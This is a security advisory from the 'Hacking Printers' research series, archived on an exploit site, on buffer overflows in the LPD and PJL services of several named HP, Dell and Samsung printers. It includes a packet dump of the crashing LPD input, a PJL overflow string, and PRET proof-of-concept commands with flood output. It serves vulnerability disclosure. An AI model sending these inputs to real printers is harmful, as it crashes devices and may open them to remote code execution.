exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hacking Printers Advisory 4

Hacking Printers Advisory 4
Posted Jan 31, 2017
Authored by Jens Mueller

This post is about buffer overflows in a printer's LPD daemon and PJL interpreter which leads to denial of service or potentially even to code execution. Multiple printers are affected.

tags | advisory, denial of service, overflow, code execution
SHA-256 | ed3f781546ee705d1385f6e94873f6738e66f693d3e7c6ffb379426cacaefa6b

Hacking Printers Advisory 4

Change Mirror Download
TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 4 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
buffer overflows in the printer's LPD daemon and PJL interpreter which
leads to denial of service or potentially even to code execution. The
attack can be performed by anyone who can print, for example through USB
or network. It can even be carried out by a malicious website, using
cross-site printing techniques (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

==================[ Buffer Overflow in LPD Service ]==================

-------------------------[ Affected Devices ]-------------------------

This vulnerability has been verfied for the devices listed below:

- HP LaserJet 1200 (Firmware version: M.22.09)
- HP LaserJet 4200N (Firmware version: 20050602)
- HP LaserJet 4250N (Firmware version: 20150130)
- Dell 3110cn (Firmware version: 200707111148)
- Samsung MultiPress 6345N (Firmware: 1.03.00.81)

More printers are likely to be affected.
Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The printer's LPD service listening on port 515/tcp is prone to a buffer
overflow vulnerability. Sending 150 characters or more as username
operator of the control file's L command (print banner page) completely
crashes the device and requires a manual restart to get the printer back
to life. Given correct shellcode and return address, this vulnerability
may lead to remote code execution. A packet dump is shown below.

----------------------------------------------------------------------
> 02 6c 70 0a .lp.
< 00 .
> 02 31 35 32 20 63 66 41 30 30 31 0a .152 cfA001.
< 00 .
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 0a 00 xxxxxxx..
----------------------------------------------------------------------

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published, which includes a simple LPD fuzzer to
test for buffer overflows by setting all user inputs defined by the LPD
protocol to a certain value (in our case, Python output). The attack can
be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET/lpd/
$ ./lpdtest.py printer in "`python -c 'print "x"*150'`"

==================[ Buffer Overflow in PJL Interpreter ]==================

-------------------------[ Affected Devices ]-------------------------

This vulnerability has been verfied for the devices listed below:

- Dell 1720n (Firmware version: NM.NA.N099)

More printers are likely to be affected.

--------------------[ Vulnerability Description ]---------------------

Sending about 3.000 characters and more to the PJL interpreter crashes
the device and requires a manual restart to get the printer back to
life. Given correct shellcode and return address, this vulnerability
might even lead to remote code execution:

----------------------------------------------------------------------
@PJL SET 000000000000000000000000000000000000000000000000000000000a|
----------------------------------------------------------------------

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. Testing a device buffer overflows in
the PJL interpreter can be done as follows:

$ cd ..
$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

-----------------------[ Further Information ]------------------------

Information on buffer overflows in printer devices can be found at:
http://hacking-printers.net/wiki/index.php/Buffer_overflows


Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close